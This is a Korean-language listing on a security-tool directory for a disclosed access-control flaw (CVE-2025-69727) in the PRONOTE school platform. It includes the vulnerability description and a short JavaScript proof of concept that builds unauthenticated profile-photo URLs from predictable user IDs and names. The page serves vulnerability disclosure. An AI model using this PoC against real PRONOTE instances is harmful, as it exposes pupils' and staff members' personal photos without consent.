Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-69727 — CVE-2025-69727 | Kitploit
도구/GitHubGitHub/0xzerosec/cve-2025-69727
ReconnaissanceVulnerability AnalysisInformation GatheringWeb SecurityMisconfiguration
GitHub0xzerosec/cve-2025-69727

CVE-2025-69727

CVE-2025-69727

저장소 보기
226개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-69727

제품 공급업체

INDEX-EDUCATION

영향을 받는 제품 코드 베이스

PRONOTE - 202X.X.X < 2025.2.8

설명

INDEX-EDUCATION PRONOTE 2025.2.8 이전 버전에는 잘못된 접근 제어 취약점이 존재합니다. 영향을 받는 구성 요소(composeUrlImgPhotoIndividu)는 사용자 ID 및 이름과 같은 예측 가능한 식별자만을 기반으로 사용자 프로필 이미지에 대한 직접 URL을 생성할 수 있습니다. 이러한 URL을 생성하거나 접근할 때 인증 검사 부재 및 속도 제한 부족으로 인해, 인증되지 않았거나 권한이 없는 행위자가 추측하거나 알려진 식별자를 사용하여 요청을 구성함으로써 사용자의 프로필 사진을 검색할 수 있습니다.

PoC

root@kitploit:~
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";

IE.fModule({
  f: function (exports, require, module, global) {
    const ObjetElement = require("ObjetElement");
    const AccesApp = global.GApplication;

    const comm = AccesApp.communication;

    for (const obj of arr) {
      const path = comm.composeUrlFichierExterne(
        obj.L.replace(/[\s]/gi, "_") + ".jpg",
        new ObjetElement.ObjetElement("", obj.N)
      );

      const url = `${base}/${path}`;

      console.log(url);
    }
  },
  fn: "testIEmodule.js",
});

발견자

  • raphckrman
  • GameCreep35
도구 다운로드